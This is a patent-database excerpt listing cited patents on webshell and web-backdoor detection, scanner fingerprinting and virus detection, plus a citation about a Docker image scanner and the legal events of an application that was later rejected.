KR20090088687A (en) * 2008-02-15 2009-08-20 한국정보보호진흥원 System for detecting webshell and method thereof
KR101080953B1 (en) * 2011-05-13 2011-11-08 (주)유엠브이기술 System and method for detecting and protecting webshell in real-time
CN107659570A (en) * 2017-09-29 2018-02-02 杭州安恒信息技术有限公司 Webshell detection methods and system based on machine learning and static and dynamic analysis
CN109067708A (en) * 2018-06-29 2018-12-21 北京奇虎科技有限公司 A kind of detection method, device, equipment and the storage medium at webpage back door
CN109583567A (en) * 2018-11-29 2019-04-05 四川大学 A kind of Web autoscanner fingerprint recognition model based on CNN
CN109657467A (en) * 2018-11-26 2019-04-19 北京兰云科技有限公司 A kind of webpage back door detection method and device, computer readable storage medium
CN109753798A (en) * 2018-12-11 2019-05-14 四川大学 A kind of Webshell detection model based on random forest and FastText
CN109800574A (en) * 2018-12-12 2019-05-24 中国人民公安大学 Computer Virus Detection Method and system based on cryptographic algorithm analysis

Non-Patent Citations (1)

* Cited by examiner, † Cited by third party
Title
LOVEYOUYOU: "Implementation of a Docker image scanner", WeChat public platform account named "REEBUF" *

Legal Events

Date Code Title Description
PB01 Publication
SE01 Entry into force of request for substantive examination
RJ01 Rejection of invention patent application after publication
Application publication date: 20190906